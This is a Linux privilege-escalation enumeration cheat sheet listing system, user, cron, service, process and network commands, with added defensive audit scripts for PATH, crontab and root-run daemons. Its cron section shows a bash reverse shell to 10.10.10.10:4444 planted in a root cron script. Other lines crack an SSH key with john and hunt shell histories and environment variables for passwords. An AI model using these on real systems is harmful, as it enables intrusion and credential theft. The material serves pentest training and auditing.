
Information gathering (Linux)

Automated Enumeration Tools


  • LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
  • LinEnum: https://github.com/rebootuser/LinEnum
  • LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
  • Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
  • Linux Priv Checker: https://github.com/linted/linuxprivchecker
  • unix_privesc_check: https://pentestmonkey.net/tools/audit/unix-privesc-check

Host


hostname

System Information


OS info

Let's start by gaining some knowledge of the OS that is running:

cat /etc/issue
cat /etc/*-release

Kernel version

uname -a
cat /proc/version
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz

Path

If you have write permissions on any folder inside the PATH variable you may be able to hijack some libraries or binaries:

echo $PATH
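As an added example that is not part of this cheat sheet, the following POSIX shell function classifies every entry of a PATH value so the risky ones stand out: empty or "." entries, relative entries, missing directories, and existing directories that are world-writable or writable by the current user. The classification labels and the function name audit_path are this example's own; the checks use only test and POSIX find.

```shell
#!/bin/sh
# Added audit example, not part of the original cheat sheet: classify every
# entry of a PATH value. One "kind:entry" line is printed per finding and the
# function returns 0 when nothing was flagged, 1 otherwise.
#   cwd            empty entry or "." (commands resolve from the current directory)
#   relative       no leading "/", so it depends on where the caller stands
#   missing        absolute directory that does not exist (anyone who can write
#                  its parent can create it)
#   world-writable existing directory with the o+w bit (POSIX find -perm -0002)
#   writable       existing directory the current user can write (test -w; this
#                  is true for everything when the audit itself runs as root)
audit_path() {
    rest="$1:"            # trailing ":" so a final empty entry is seen too
    found=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case $entry in
            ''|.)
                echo "cwd:${entry:-<empty>}"; found=1 ;;
            /*)
                if [ ! -d "$entry" ]; then
                    echo "missing:$entry"; found=1
                elif [ -n "$(find "$entry" -prune -perm -0002 2>/dev/null)" ]; then
                    echo "world-writable:$entry"; found=1
                elif [ -w "$entry" ]; then
                    echo "writable:$entry"; found=1
                fi ;;
            *)
                echo "relative:$entry"; found=1 ;;
        esac
    done
    return $found
}

# Stand-alone run: audit the calling user's own PATH.
if audit_path "$PATH"; then
    echo "PATH: nothing flagged"
else
    echo "PATH: review the findings above"
fi
```

The world-writable test is the one that matters when the audit runs as root, because `test -w` then succeeds for every directory; the `writable` label is what an unprivileged user sees for directories they own.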

Env info

Is there any interesting information, such as passwords or API keys, in the environment variables?

(env || set) 2>/dev/null

List Mounted Drives

cat /proc/mounts
mount
df -aTh
findmnt

Kernel exploits

Check the kernel version and whether there is a known exploit that could be used to escalate privileges:

cat /proc/version
uname -a
searchsploit "Linux Kernel"

Useful software


Enumerate useful binaries

which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 python3.9 python3.10 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null

Also, check whether any compiler is installed. This is useful if you need to use a kernel exploit, as it is recommended to compile it on the machine where you are going to use it (or on a similar one):

(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")

Vulnerable Software Installed

Check the versions of the installed packages and services. Maybe there is some old Nagios version (for example) that could be exploited to escalate privileges. It is recommended to check manually the versions of the more suspicious installed software.

dpkg -l #Debian
rpm -qa #CentOS

If you have SSH access to the machine you could also use OpenVAS to check for outdated and vulnerable software installed on the machine.

Note that these commands will show a lot of information, most of which will be useless, so it is recommended to use an application like OpenVAS or similar that checks whether any installed software version is vulnerable to known exploits.

User


User Info

id
whoami
users
groups

Users

cat /etc/passwd

User history

history
cat /home/<user>/.bash_history
cat ~/.bash_history | less
cat ~/.mysql_history | less
cat ~/.nano_history | less
cat ~/.*history | less

Find file by name

find . -name flag.txt

Find file owned by user

find <directory-location> -user <username> -name <file-name> 2>/dev/null

Find file owned by a group

find <directory-location> -group <group-name> -name <file-name>  2>/dev/null

Find file owned by a group (executable)

find <directory-location> -executable -group <group-name>  2>/dev/null

Crack id_rsa

ssh2john id_rsa > id_rsa-hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa-hash

Cron


Cron Jobs - File Permissions

Check the cron job configuration:

cat /etc/crontab
ls -lah /etc/cron*
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Check whether you can overwrite any script that is executed as root, for example:

#!/bin/bash
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1

Cron Jobs - PATH Environment Variable

Check the cron job configuration:

cat /etc/crontab

Check the PATH configuration: do you have write access to any of those paths? If so, try to create a script there.
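The following is an added audit example, not code from the cheat sheet. It parses a file in the /etc/crontab layout and reports jobs whose program file is world-writable, bare command names that do not resolve in the crontab PATH, and world-writable directories in the crontab's PATH= line, so it covers both the file-permission check and the PATH check above. The sample crontab and scripts are constructed in a temporary directory; the function names (audit_crontab, split_path, world_writable, resolve_in_path) are this example's own.

```shell
#!/bin/sh
# Added audit example, not part of the original cheat sheet. It reads a file in
# the system crontab layout (five time fields, a user, then the command) and
# reports the weaknesses discussed in the two cron sections above:
#   job:<user>:world-writable:<file>  the program a job runs has the o+w bit
#   job:<user>:unresolved:<name>      a bare command name not found in the
#                                     crontab PATH (a writable directory that
#                                     comes earlier in that PATH could supply it)
#   path:world-writable:<dir>         a directory in the crontab's PATH= line
#                                     that anyone can write to
# @reboot-style lines and per-user crontabs (no user field) are skipped. Vixie
# cron's documented default PATH for jobs is /usr/bin:/bin (man 5 crontab).
# Checks are from the auditor's side (world-writable); a check from one
# unprivileged user's side would use "test -w" instead.

# Print the entries of a colon-separated list, one per line.
split_path() {
    rest="$1:"
    while [ -n "$rest" ]; do
        printf '%s\n' "${rest%%:*}"
        rest=${rest#*:}
    done
}

# True if the path exists and has the o+w bit (POSIX find; -prune stops descent).
world_writable() {
    [ -e "$1" ] && [ -n "$(find "$1" -prune -perm -0002 2>/dev/null)" ]
}

# Print the first "<dir>/<name>" that exists in the search list, else fail.
resolve_in_path() {
    name=$1
    for dir in $(split_path "$2"); do
        if [ -f "$dir/$name" ]; then printf '%s\n' "$dir/$name"; return 0; fi
    done
    return 1
}

# Audit one crontab file. Returns 0 when clean, 1 when something was flagged.
audit_crontab() {
    file=$1
    cron_path=/usr/bin:/bin
    found=0
    set -f                                  # never glob-expand the "*" time fields
    while IFS= read -r line || [ -n "$line" ]; do
        case $line in
            ''|'#'*) continue ;;
            PATH=*)
                cron_path=$(printf '%s' "${line#PATH=}" | tr -d '"')
                for dir in $(split_path "$cron_path"); do
                    if world_writable "$dir"; then
                        echo "path:world-writable:$dir"; found=1
                    fi
                done
                continue ;;
            [A-Za-z_]*=*) continue ;;       # SHELL=, MAILTO= and other variables
        esac
        set -- $line
        [ $# -ge 7 ] || continue            # not a "m h dom mon dow user cmd" line
        user=$6
        prog=$7
        case $prog in
            /*) target=$prog ;;
            *)  target=$(resolve_in_path "$prog" "$cron_path") || {
                    echo "job:$user:unresolved:$prog"; found=1; continue
                } ;;
        esac
        if world_writable "$target"; then
            echo "job:$user:world-writable:$target"; found=1
        fi
    done < "$file"
    set +f
    return $found
}

# Constructed sample: one world-writable script, one correctly protected one,
# one bare command name, and a crontab PATH that starts with a world-writable dir.
demo=$(mktemp -d)
trap 'rm -rf "$demo"' EXIT
mkdir -p "$demo/scripts" "$demo/opt-bin"
printf '#!/bin/sh\necho backup\n' > "$demo/scripts/backup.sh"
printf '#!/bin/sh\necho rotate\n' > "$demo/scripts/rotate.sh"
chmod 777 "$demo/scripts/backup.sh" "$demo/opt-bin"   # the weak settings under test
chmod 755 "$demo/scripts/rotate.sh"
DEMO_CRONTAB=$demo/crontab
cat > "$DEMO_CRONTAB" <<EOF
# constructed sample in /etc/crontab layout
SHELL=/bin/sh
PATH="$demo/opt-bin:/usr/bin:/bin"
*/5 * * * * root $demo/scripts/backup.sh
0 3 * * *   root $demo/scripts/rotate.sh --all
15 * * * *  root cleanup-tmp
EOF

if audit_crontab "$DEMO_CRONTAB"; then
    echo "crontab: nothing flagged"
else
    echo "crontab: review the findings above"
fi
```

Run against the real files with `audit_crontab /etc/crontab` and one call per file in /etc/cron.d; the per-directory drop-ins under /etc/cron.daily and friends are plain scripts, so for those only the world_writable check applies.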

Services


Service

sudo systemctl start apache2
sudo systemctl status apache2
sudo systemctl restart apache2
sudo systemctl stop apache2
sudo systemctl enable apache2 # autostart on boot time
systemctl list-unit-files # list all services

Service settings: is anything misconfigured?

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' 2>/dev/null

Processes


List process

Take a look at which processes are running and check whether any process has more privileges than it should (maybe a Tomcat instance running as root?):

ps -A
ps axjf
ps aux
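As an added example (not from the cheat sheet), the function below reads `ps aux` output and reports watched daemons that run as root without any non-root process alongside, which is the "Tomcat as root" case above in a form that does not false-alarm on servers like nginx that keep a root master and unprivileged workers. The WATCHED list and the constructed sample process lines are assumptions of the example, not data from a real host.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet: read "ps aux" output and
# flag watched daemons that run as root without any non-root instance alongside.
# Servers such as nginx or apache2 keep a root master process and drop to a
# service account for their workers, so a root process by itself is not a
# finding; a daemon whose every process is root is. The watch list is an
# assumption for the demo; tune it to the host's baseline. The sample "ps aux"
# lines are constructed, not captured from a real system.

# Daemons expected to run (at least their workers) under a service account.
WATCHED="tomcat java httpd apache2 nginx mysqld mariadbd postgres redis-server mongod php-fpm node"

# Read "ps aux" lines from stdin; print "root-only:<name>:<pid>" per finding.
# Returns 0 when nothing was flagged, 1 otherwise.
flag_root_only_services() {
    root_seen=""; other_seen=""
    while IFS= read -r line; do
        set -f; set -- $line; set +f       # split fields, never glob "[kworker]"
        [ $# -ge 11 ] || continue          # USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
        [ "$1" = USER ] && continue        # header line
        user=$1; pid=$2
        shift 10
        name=${1##*/}                      # /usr/sbin/mysqld -> mysqld
        name=${name%:}                     # "nginx:" -> nginx
        case $line in *catalina*) name=tomcat ;; esac   # Tomcat shows up as java
        case " $WATCHED " in
            *" $name "*) ;;
            *) continue ;;
        esac
        if [ "$user" = root ]; then
            root_seen="$root_seen $name:$pid"
        else
            other_seen="$other_seen $name"
        fi
    done
    found=0
    for entry in $root_seen; do
        name=${entry%%:*}; pid=${entry#*:}
        case " $other_seen " in
            *" $name "*) ;;                # an unprivileged sibling exists
            *) echo "root-only:$name:$pid"; found=1 ;;
        esac
    done
    return $found
}

# Constructed sample of "ps aux" output for the demo.
demo_ps() {
    cat <<'EOF'
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1 169000 11000 ?        Ss   10:00   0:01 /sbin/init
root       812  0.0  0.2  72000 15000 ?        Ss   10:00   0:00 nginx: master process /usr/sbin/nginx
www-data   813  0.0  0.1  73000  9000 ?        S    10:00   0:00 nginx: worker process
root       901  1.2  8.0 2400000 640000 ?      Sl   10:00   1:12 /usr/bin/java -Dcatalina.home=/opt/tomcat org.apache.catalina.startup.Bootstrap start
root       955  0.3  4.0 1100000 320000 ?      Ssl  10:00   0:20 /usr/sbin/mysqld
postgres  1020  0.1  1.0 210000  80000 ?       Ss   10:00   0:03 /usr/lib/postgresql/14/bin/postgres -D /var/lib/postgresql/14/main
EOF
}

if demo_ps | flag_root_only_services; then
    echo "processes: nothing flagged"
else
    echo "processes: review the findings above"
fi
```

On a live host replace `demo_ps` with `ps aux`; the sample yields the Tomcat JVM and mysqld as root-only, while nginx (root master, www-data worker) and postgres (running as postgres) pass.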

Installed Applications

Applications (Debian)

dpkg -l

Readable/Writable Files and Directories

find / -writable -type d 2>/dev/null

Network


TCP/IP configuration

ip a
ifconfig -a

Routing tables

/sbin/route
/sbin/routel

Active network connections

ss -anp
netstat -antup
netstat -antpx
netstat -tulpn

Disks

mount
cat /etc/fstab
/bin/lsblk

Device Drivers and Kernel Modules

Enumerate the loaded kernel modules:

lsmod

Use modinfo to find out more about a specific module:

/sbin/modinfo libata